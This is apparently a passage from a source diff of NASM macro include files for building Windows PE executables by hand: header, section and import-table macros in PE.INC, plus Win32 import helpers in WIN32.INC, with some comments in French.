MZHeader_RelocationsNumber_FA: dw 0
|
||||
MZHeader_HeaderParagraphsNumber_FA: dw (MZExtendedHeader_End_FA-MZHeader_Begin_FA)/16
|
||||
MZHeader_MinimumMemory_FA: dw MZHeader_MinimumMemory
|
||||
MZHeader_MaximumMemory_FA: dw MZHeader_MaximumMemory
|
||||
MZHeader_Ss_FA: dw MZHeader_Ss
|
||||
MZHeader_Sp_FA: dw MZHeader_Sp
|
||||
MZHeader_Checksum_FA: dw 0
|
||||
MZHeader_Ip_FA: dw MZHeader_Ip
|
||||
MZHeader_Cs_FA: dw MZHeader_Cs
|
||||
MZHeader_RelocationTableFA_FA: dw 0040h ;0040h=>fichier PE
|
||||
MZHeader_OverlayNumber_FA: dw 0
|
||||
MZHeader_End_FA:
|
||||
%repl MZHeader
|
||||
%else
|
||||
%error PE.INC error: MZHeader => BIN_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================ MZ Extended Header =============================
|
||||
%macro MZExtendedHeader 0
|
||||
%ifctx MZHeader
|
||||
MZExtendedHeader_Begin_FA:
|
||||
dd 0
|
||||
dw 0
|
||||
%rep 26
|
||||
db 0
|
||||
%endrep
|
||||
MZExtendedHeader_PEHeaderFA_FA: dd PEHeader_Begin_FA
|
||||
MZExtendedHeader_End_FA:
|
||||
%repl MZExtendedHeader
|
||||
%else
|
||||
%error PE.INC error: MZExtendedHeader => MZHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================== MZ Text ==================================
|
||||
%macro MZSection.text_Begin 0
|
||||
%ifctx MZExtendedHeader
|
||||
MZSection.text_Begin_FA:
|
||||
%define MZSection.text_VA(a) (a)-MZSection.text_Begin_FA
|
||||
%repl MZSection.text_Begin
|
||||
%else
|
||||
%error PE.INC error: MZSection.text_Begin => MZExtendedHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro MZSection.text_End 0
|
||||
%ifctx MZSection.text_Begin
|
||||
MZSection.text_End_FA:
|
||||
DbAlign MZSection.text_Begin_FA,16
|
||||
MZSection.text_End_FAa:
|
||||
%repl MZSection.text_End
|
||||
%else
|
||||
%error PE.INC error: MZSection.text_End => MZSection.text_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================= PE Header =================================
|
||||
%define PEHeader_Machine_386 14Ch
|
||||
%define PEHeader_Machine_486 14Dh
|
||||
%define PEHeader_Machine_PENTIUM 14Eh
|
||||
%define PEHeader_Machine PEHeader_Machine_386
|
||||
%define PEHeader_DateHour 0
|
||||
%define PEHeader_OptionalHeaderFS 0E0h ; ?
|
||||
%define PEHeader_Characteristics_NORELOCATIONS 0000000000000001b
|
||||
%define PEHeader_Characteristics_EXECUTABLEIMAGE 0000000000000010b ;ex‚cutable/librairie
|
||||
%define PEHeader_Characteristics_16B 0000000001000000b ;programme 16 bits
|
||||
%define PEHeader_Characteristics_BYTESREVERSEDLOW 0000000010000000b
|
||||
%define PEHeader_Characteristics_32B 0000000100000000b ;programme 32 bits
|
||||
%define PEHeader_Characteristics_NODEBUGINFORMATIONS 0000001000000000b
|
||||
%define PEHeader_Characteristics_SYSTEMFILE 0001000000000000b
|
||||
%define PEHeader_Characteristics_DLL 0010000000000000b
|
||||
%define PEHeader_Characteristics_BYTESREVERSEDHIGH 1000000000000000b
|
||||
%define PEHeader_Characteristics PEHeader_Characteristics_NORELOCATIONS | PEHeader_Characteristics_EXECUTABLEIMAGE | PEHeader_Characteristics_32B
|
||||
|
||||
%macro PEHeader 0
|
||||
%ifctx MZSection.text_End
|
||||
BITS 32
|
||||
PEHeader_Begin_FA:
|
||||
PEHeader_Signature_FA: db 'PE',00h,00h
|
||||
PEHeader_Machine_FA: dw PEHeader_Machine
|
||||
PEHeader_SectionsNumber_FA: dw PEHeader_SectionsNumber
|
||||
%assign PEHeader_SectionsNumber_Assign 0
|
||||
PEHeader_DateHour_FA: dd PEHeader_DateHour
|
||||
dd 0
|
||||
dd 0
|
||||
PEHeader_OptionalHeaderFS_FA: dw PEHeader_OptionalHeaderFS
|
||||
PEHeader_Characteristics_FA: dw PEHeader_Characteristics
|
||||
PEHeader_End_FA:
|
||||
%define PESection_RVA(a) PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
|
||||
%define PESection.text_RVA(a) PESection.text_RVAa+(a)-PESection.text_Begin_FAa
|
||||
%define PESection.rdata_RVA(a) PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
|
||||
%define PESection.data_RVA(a) PESection.data_RVAa+(a)-PESection.data_Begin_FAa
|
||||
%define PESection.bss_RVA(a) PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
|
||||
%define PESection.idata_RVA(a) PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
|
||||
%repl PEHeader
|
||||
%else
|
||||
%error PE.INC error: PEHeader => MZSection.text_End
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================ PE Optional Header =============================
|
||||
%define PEOptionalHeader_MajorLinkerVersion 0
|
||||
%define PEOptionalHeader_MinorLinkerVersion 0
|
||||
%define PEOptionalheader_EipRVA PESection.text_RVA(PESection.text_Begin_FAa)
|
||||
%define PEOptionalHeader_ImageVAa 00400000h
|
||||
%define PEOptionalHeader_Va 1000h
|
||||
%define PEOptionalHeader_Fa 200h
|
||||
%define PEOptionalHeader_MajorOSVersion 4
|
||||
%define PEOptionalHeader_MinorOSVersion 0
|
||||
%define PEOptionalHeader_MajorProgramVersion 0
|
||||
%define PEOptionalHeader_MinorProgramVersion 0
|
||||
%define PEOptionalHeader_MajorSubSystemVersion 4
|
||||
%define PEOptionalHeader_MinorSubSystemVersion 0
|
||||
%define PEOptionalHeader_SubSystem_DRIVER 1
|
||||
%define PEOptionalHeader_SubSystem_GUI 2
|
||||
%define PEOptionalHeader_SubSystem_CONSOLE 3
|
||||
%define PEOptionalHeader_SubSystem_POSIX 7
|
||||
%define PEOptionalHeader_SubSystem PEOptionalHeader_SubSystem_GUI
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSATTACHMENTS 0001b
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSDETACHMENTS 0010b
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSATTACHMENTS 0100b
|
||||
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSDETACHMENTS 1000b
|
||||
%define PEOptionalHeader_DllFlags 0
|
||||
%define PEOptionalHeader_ReservedStackVSa 0
|
||||
%define PEOptionalHeader_CommittedStackVSa 0
|
||||
%define PEOptionalHeader_ReservedHeapVSa 0
|
||||
%define PEOptionalHeader_CommittedHeapVSa 0
|
||||
|
||||
%macro PEOptionalHeader_Begin 0
|
||||
%ifctx PEHeader
|
||||
PEOptionalHeader_Begin_FA:
|
||||
PEOptionalHeader_Signature_FA: db 0Bh,01h
|
||||
PEOptionalHeader_MajorLinkerVersion_FA: db PEOptionalHeader_MajorLinkerVersion
|
||||
PEOptionalHeader_MinorLinkerVersion_FA: db PEOptionalHeader_MinorLinkerVersion
|
||||
PEOptionalHeader_CodeFSa_FA: dd PESection.text_FSa
|
||||
PEOptionalHeader_InitializedDataFSa_FA: dd PEOptionalHeader_InitializedDataFSa
|
||||
%assign PEOptionalHeader_InitializedDataFSa_Assign 0
|
||||
PEOptionalHeader_UninitializedDataVSa_FA: dd PESection.bss_VSa
|
||||
PEOptionalHeader_EipRVA_FA: dd PEOptionalheader_EipRVA
|
||||
PEOptionalHeader_CodeRVAa_FA: dd PESection.text_RVAa
|
||||
%assign PEOptionalHeader_DataRVAa_Assign 0
|
||||
PEOptionalHeader_DataRVAa_FA: dd PEOptionalHeader_DataRVAa ; ?
|
||||
PEOptionalHeader_ImageVAa_FA: dd PEOptionalHeader_ImageVAa
|
||||
PEOptionalHeader_Va_FA: dd PEOptionalHeader_Va
|
||||
PEOptionalHeader_Fa_FA: dd PEOptionalHeader_Fa
|
||||
PEOptionalHeader_MajorOSVersion_FA: dw PEOptionalHeader_MajorOSVersion
|
||||
PEOptionalHeader_MinorOSVersion_FA: dw PEOptionalHeader_MinorOSVersion
|
||||
PEOptionalHeader_MajorProgramVersion_FA: dw PEOptionalHeader_MajorProgramVersion
|
||||
PEOptionalHeader_MinorProgramVersion_FA: dw PEOptionalHeader_MinorProgramVersion
|
||||
PEOptionalHeader_MajorSubSystemVersion_FA: dw PEOptionalHeader_MajorSubSystemVersion
|
||||
PEOptionalHeader_MinorSubSystemVersion_FA: dw PEOptionalHeader_MinorSubSystemVersion
|
||||
dd 0
|
||||
PEOptionalHeader_ImageVSa_FA: dd PEOptionalHeader_ImageVSa
|
||||
PEOptionalHeader_HeadersFSa_FA: dd PESections_Begin_FAa-BIN_Begin_FA
|
||||
PEOptionalHeader_Checksum_FA: dd 0
|
||||
PEOptionalHeader_SubSystem_FA: dw PEOptionalHeader_SubSystem
|
||||
PEOptionalHeader_DllFlags_FA: dw PEOptionalHeader_DllFlags
|
||||
PEOptionalHeader_ReservedStackVSa_FA: dd PEOptionalHeader_ReservedStackVSa ;???
|
||||
PEOptionalHeader_CommittedStackVSa_FA: dd PEOptionalHeader_CommittedStackVSa ;???
|
||||
PEOptionalHeader_ReservedHeapVSa_FA: dd PEOptionalHeader_ReservedHeapVSa ;???
|
||||
PEOptionalHeader_CommittedHeapVSa_FA: dd PEOptionalHeader_CommittedHeapVSa ;???
|
||||
dd 0
|
||||
PEOptionalHeader_DirectoriesNumber_FA: dd PEOptionalHeader_DirectoriesNumber
|
||||
%assign PEOptionalHeader_DirectoriesNumber_Assign 0
|
||||
%repl PEOptionalHeader_Begin
|
||||
%else
|
||||
%error PE.INC error: PEOptionalHeader_Begin => PEHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;PEOptionalHeader_Directory name,RVA,FS
|
||||
%macro PEOptionalHeader_Directory 3
|
||||
%ifctx PEOptionalHeader_Begin
|
||||
PEOptionalHeader%1RVA_FA: dd %2
|
||||
PEOptionalHeader%1FS_FA: dd %3
|
||||
%assign PEOptionalHeader_DirectoriesNumber_Assign PEOptionalHeader_DirectoriesNumber_Assign+1
|
||||
%else
|
||||
%error PE.INC error: PEOptionalHeader_Directory => PEOptionalHeader_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PEOptionalHeader_End 0
|
||||
%ifctx PEOptionalHeader_Begin
|
||||
PEOptionalHeader_End_FA:
|
||||
DbAlign PEOptionalHeader_Begin_FA,PEHeader_OptionalHeaderFS
|
||||
PEOptionalHeader_End_FAa:
|
||||
PEOptionalHeader_DirectoriesNumber equ PEOptionalHeader_DirectoriesNumber_Assign
|
||||
%repl PEOptionalHeader_End
|
||||
%else
|
||||
%error PE.INC error: PEOptionalHeader_End => PEOptionalHeader_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================= PE Section Header =============================
|
||||
%define PESectionHeader_Flags_EXECUTABLECODE 00000000000000000000000000100000b
|
||||
%define PESectionHeader_Flags_DATAFROMFILE 00000000000000000000000001000000b
|
||||
%define PESectionHeader_Flags_DATA0 00000000000000000000000010000000b
|
||||
%define PESectionHeader_Flags_COMMENTS 00000000000000000000001000000000b
|
||||
%define PESectionHeader_Flags_COMMONBLOCKDATA 00000000000000000001000000000000b
|
||||
%define PESectionHeader_Flags_FARDATA 00000000000000001000000000000000b
|
||||
%define PESectionHeader_Flags_PURGEABLEDATA 00000000000000100000000000000000b
|
||||
%define PESectionHeader_Flags_NONMOVABLEDATA 00000000000001000000000000000000b
|
||||
%define PESectionHeader_Flags_SHAREDINSTANCES 00010000000000000000000000000000b ;.text
|
||||
%define PESectionHeader_Flags_EXECUTEACCESS 00100000000000000000000000000000b
|
||||
%define PESectionHeader_Flags_READACCESS 01000000000000000000000000000000b
|
||||
%define PESectionHeader_Flags_WRITEACCESS 10000000000000000000000000000000b
|
||||
|
||||
;PESectionHeader .name,'.name',flags
|
||||
%macro PESectionHeader 3
|
||||
%ifctx PEOptionalHeader_End
|
||||
PESectionHeader%1_Name_FA: db %2
|
||||
DbAlign PESectionHeader%1_Name_FA,8
|
||||
PESectionHeader%1_VS_FA: dd PESection%1_VS
|
||||
PESectionHeader%1_RVAa_FA: dd PESection%1_RVAa
|
||||
PESectionHeader%1_FSa_FA: dd PESection%1_FSa
|
||||
PESectionHeader%1_FAa_FA: dd PESectionHeader%1_FAa
|
||||
dd 0
|
||||
dd 0
|
||||
dw 0
|
||||
dw 0
|
||||
PESectionHeader%1_Flags_FA: dd %3
|
||||
%else
|
||||
%error PE.INC error: PESectionHeader => PEOptionalHeader_End
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================ PE Sections ================================
|
||||
%macro PESections_Begin 0
|
||||
%ifctx PEOptionalHeader_End
|
||||
PESections_Begin_FA:
|
||||
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
|
||||
PESections_Begin_FAa:
|
||||
%assign PESectionPrec_FSa_Assign PESections_Begin_FAa-BIN_Begin_FA
|
||||
%assign PESectionPrec_RVAa_Assign 0
|
||||
%assign PESectionCur_RVAa_Assign 0
|
||||
%define PESectionCur_FAa_Define 0
|
||||
;impossible dans MacroPESection_Begin
|
||||
%define PESection_VA(a) PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
|
||||
%define PESection.text_VA(a) PEOptionalHeader_ImageVAa+PESection.text_RVAa+(a)-PESection.text_Begin_FAa
|
||||
%define PESection.rdata_VA(a) PEOptionalHeader_ImageVAa+PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
|
||||
%define PESection.data_VA(a) PEOptionalHeader_ImageVAa+PESection.data_RVAa+(a)-PESection.data_Begin_FAa
|
||||
%define PESection.bss_VA(a) PEOptionalHeader_ImageVAa+PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
|
||||
%define PESection.idata_VA(a) PEOptionalHeader_ImageVAa+PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
|
||||
%repl PESections_Begin
|
||||
%else
|
||||
%error PE.INC error: PESections_Begin => PEOptionalHeader
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;MacroPESection_End .name
|
||||
%macro MacroPESection_End 1
|
||||
PESection%1_End_FA:
|
||||
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
|
||||
PESection%1_End_FAa:
|
||||
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
|
||||
PESection%1_VS equ PESection%1_End_FA-PESection%1_Begin_FAa
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.text_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.text_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.text_Begin_FAa
|
||||
%push PESection.text_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.text_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.text_End 0
|
||||
%ifctx PESection.text_Begin
|
||||
MacroPESection_End .text
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.text_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.text_FSa equ PESection.text_End_FAa-PESection.text_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.text_FSa
|
||||
PESectionHeader.text_FAa equ PESection.text_Begin_FAa
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.text_End => PESection.text_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.rdata_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.rdata_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.rdata_Begin_FAa
|
||||
%push PESection.rdata_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.rdata_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.rdata_End 0
|
||||
%ifctx PESection.rdata_Begin
|
||||
MacroPESection_End .rdata
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.rdata_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.rdata_FSa equ PESection.rdata_End_FAa-PESection.rdata_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.rdata_FSa
|
||||
PESectionHeader.rdata_FAa equ PESection.rdata_Begin_FAa
|
||||
%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.rdata_FSa
|
||||
%if PEOptionalHeader_DataRVAa_Assign == 0
|
||||
%assign PEOptionalHeader_DataRVAa_Assign PESection.rdata_RVAa
|
||||
%endif
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.rdata_End => PESection.rdata_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.data_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.data_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.data_Begin_FAa
|
||||
%push PESection.data_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.data_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.data_End 0
|
||||
%ifctx PESection.data_Begin
|
||||
MacroPESection_End .data
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.data_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.data_FSa equ PESection.data_End_FAa-PESection.data_Begin_FAa
|
||||
PESectionHeader.data_FAa equ PESection.data_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.data_FSa
|
||||
%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.data_FSa
|
||||
%if PEOptionalHeader_DataRVAa_Assign == 0
|
||||
%assign PEOptionalHeader_DataRVAa_Assign PESection.data_RVAa
|
||||
%endif
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.data_End => PESection.data_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.bss_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
SECTION .bss
|
||||
PESection.bss_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.bss_Begin_FAa
|
||||
%push PESection.bss_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.bss_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.bss_End 0
|
||||
%ifctx PESection.bss_Begin
|
||||
PESection.bss_End_FA:
|
||||
ResbAlign PESection.bss_Begin_FAa,PEOptionalHeader_Va
|
||||
PESection.bss_End_FAa:
|
||||
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
|
||||
PESection.bss_VS equ PESection.bss_End_FA-PESection.bss_Begin_FAa
|
||||
PESection.bss_VSa equ PESection.bss_End_FAa-PESection.bss_Begin_FAa
|
||||
SECTION .text
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.bss_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.bss_FSa equ 0
|
||||
%assign PESectionPrec_FSa_Assign PESection.bss_VSa
|
||||
PESectionHeader.bss_FAa equ 0
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.bss_End => PESection.bss_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.idata_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.idata_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.idata_Begin_FAa
|
||||
%push PESection.idata_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.idata_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.idata_End 0
|
||||
%ifctx PESection.idata_Begin
|
||||
MacroPESection_End .idata
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.idata_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.idata_FSa equ PESection.idata_End_FAa-PESection.idata_Begin_FAa
|
||||
PESectionHeader.idata_FAa equ PESection.idata_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.idata_FSa
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.idata_End => PESection.idata_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESection.rsrc_Begin 0
|
||||
%ifctx PESections_Begin
|
||||
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PESection.rsrc_Begin_FAa:
|
||||
%define PESectionCur_FAa_Define PESection.rsrc_Begin_FAa
|
||||
%push PESection.rsrc_Begin
|
||||
%else
|
||||
%error PE.INC error: PESection.rsrc_Begin => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro PESection.rsrc_End 0
|
||||
%ifctx PESection.rsrc_Begin
|
||||
MacroPESection_End .rsrc
|
||||
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
|
||||
PESection.rsrc_RVAa equ PESectionPrec_RVAa_Assign
|
||||
PESection.rsrc_FSa equ PESection.rsrc_End_FAa-PESection.rsrc_Begin_FAa
|
||||
PESectionHeader.rsrc_FAa equ PESection.rsrc_Begin_FAa
|
||||
%assign PESectionPrec_FSa_Assign PESection.rsrc_FSa
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: PESection.rsrc_End => PESection.rsrc_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
%macro PESections_End 0
|
||||
%ifctx PESections_Begin
|
||||
PESections_End_FAa:
|
||||
PEHeader_SectionsNumber equ PEHeader_SectionsNumber_Assign
|
||||
PEOptionalHeader_InitializedDataFSa equ PEOptionalHeader_InitializedDataFSa_Assign
|
||||
PEOptionalHeader_DataRVAa equ PEOptionalHeader_DataRVAa_Assign
|
||||
%assign PESectionPrec_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign) / PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
|
||||
PEOptionalHeader_ImageVSa equ PESectionPrec_RVAa_Assign
|
||||
Import_Directorys_RVA equ Import_Directorys_Assign
|
||||
%repl PESections_End
|
||||
%else
|
||||
%error PE.INC error: PESections_End => PESections_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;============================= Import Directorys =============================
|
||||
;Import_Directorys_Begin sectionname
|
||||
%macro Import_Directorys_Begin 1
|
||||
Import_Directorys_Begin_FA:
|
||||
%assign Import_Directorys_Assign PESectionCur_RVAa_Assign+Import_Directorys_Begin_FA-PESectionCur_FAa_Define
|
||||
%push Import_Directorys_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_Directory dlllogicalname
|
||||
%macro Import_Directory 1
|
||||
%ifctx Import_Directorys_Begin
|
||||
dd PESection_RVA(Import.%1_RVAs)
|
||||
dd 0 ;??? (date … 0)
|
||||
dd 0FFFFFFFFh
|
||||
dd PESection_RVA(Import.%1_String_Dll)
|
||||
dd PESection_RVA(Import.%1_VAs)
|
||||
%else
|
||||
%error PE.INC error: Import_Directory => Import_Directorys_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_Directorys_End 0
|
||||
%ifctx Import_Directorys_Begin
|
||||
times 5 dd 0
|
||||
Import_Directorys_End_FA:
|
||||
Import_Directorys_VS equ Import_Directorys_End_FA-Import_Directorys_Begin_FA
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_Directorys_End => Import_Directorys_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
;Import_RVAs_Begin dlllogicalname
|
||||
%macro Import_RVAs_Begin 1
|
||||
Import.%1_RVAs:
|
||||
%push Import_RVAs_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_RVA dlllogicalname,functionlogicalname
|
||||
%macro Import_RVA 2
|
||||
%ifctx Import_RVAs_Begin
|
||||
dd PESection_RVA(Import.%1.%2_String_Function)
|
||||
%else
|
||||
%error PE.INC error: Import_RVA => Import_RVAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_RVAs_End 0
|
||||
%ifctx Import_RVAs_Begin
|
||||
dd 0
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_RVAs_End => Import_RVAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
;Import_VAs_Begin dlllogicalname
|
||||
%macro Import_VAs_Begin 1
|
||||
Import.%1_VAs:
|
||||
%push Import_VAs_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_VA dlllogicalname,functionlogicalname,[va]
|
||||
%macro Import_VA 2-3 0FFFFFFFFh
|
||||
%ifctx Import_VAs_Begin
|
||||
Import.%1.%2: dd %3
|
||||
%2 equ PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+Import.%1.%2-PESectionCur_FAa_Define
|
||||
%else
|
||||
%error PE.INC error: Import_VA => Import_VAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_VAs_End 0
|
||||
%ifctx Import_VAs_Begin
|
||||
dd 0
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_VAs_End => Import_VAs_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
|
||||
;Import_Strings_Begin dlllogicalname
|
||||
%macro Import_Strings_Begin 1
|
||||
Import.%1_Strings:
|
||||
%push Import_Strings_Begin
|
||||
%endmacro
|
||||
|
||||
;Import_String_Function dlllogicalname,functionlogicalname,"name",[ordinal]
|
||||
%macro Import_String_Function 3-4 0h
|
||||
%ifctx Import_Strings_Begin
|
||||
Import.%1.%2_String_Function:
|
||||
dw %4
|
||||
db %3,0
|
||||
%else
|
||||
%error PE.INC error: Import_String_Function => Import_Strings_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;Import_String_Dll dlllogicalname,"dllname"
|
||||
%macro Import_String_Dll 2
|
||||
%ifctx Import_Strings_Begin
|
||||
Import.%1_String_Dll:
|
||||
db %2,0
|
||||
%repl Import_String_Dll
|
||||
%else
|
||||
%error PE.INC error: Import_String_Dll => Import_Strings_Begin
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%macro Import_Strings_End 0
|
||||
%ifctx Import_String_Dll
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: Import_Strings_End => Import_String_Dll
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
;================================== BIN End ==================================
|
||||
%macro BIN_End 0
|
||||
%ifctx PESections_End
|
||||
BIN_End_FA:
|
||||
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
|
||||
BIN_End_FAa:
|
||||
%pop
|
||||
%else
|
||||
%error PE.INC error: BIN_End => PESections_End
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
|
|
@ -0,0 +1,55 @@
|
|||
; MACROS FOR WIN32 PROGRAMMING v1.0a
|
||||
; ==================================
|
||||
|
||||
|
||||
;WIN32.INC_NO_EXTERN_IMPORT => pas d'Import
|
||||
|
||||
|
||||
;ExternImport function,dll [,d|[*]]
|
||||
; <- FUNCTION.INC_CONVENTION
|
||||
|
||||
;================================= General ===================================
|
||||
%ifndef _WIN32.INC
|
||||
%define _WIN32.INC
|
||||
|
||||
%include "function.inc"
|
||||
%include "language.inc"
|
||||
%include "win32n.inc"
|
||||
%include "win32dll.inc"
|
||||
|
||||
%macro WIN32.INC 0
|
||||
FUNCTION.INC
|
||||
%undef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%endmacro
|
||||
|
||||
%macro WIN32.INC~ 0
|
||||
FUNCTION.INC~
|
||||
%undef WIN32.INC_NO_EXTERN_IMPORT
|
||||
%endmacro
|
||||
|
||||
WIN32.INC
|
||||
|
||||
%macro ExternImport 2-3
|
||||
%ifndef ExternImport_%1
|
||||
%ifndef WIN32.INC_NO_EXTERN_IMPORT
|
||||
extern %1
|
||||
import %1 %2
|
||||
Alias @%1,[%1]
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION
|
||||
%else
|
||||
%if %0==3
|
||||
%ifnum %3
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION,%3
|
||||
%else
|
||||
Alias @%1,%3
|
||||
FunctionDefine %1,FUNCTION.INC_CONVENTION
|
||||
%endif
|
||||
%else
|
||||
Error WIN32,NO_EXTERN_IMPORT => ExternImport %1,%2,d|[*]
|
||||
%endif
|
||||
%endif
|
||||
%define ExternImport_%1
|
||||
%endif
|
||||
%endmacro
|
||||
|
||||
%endif
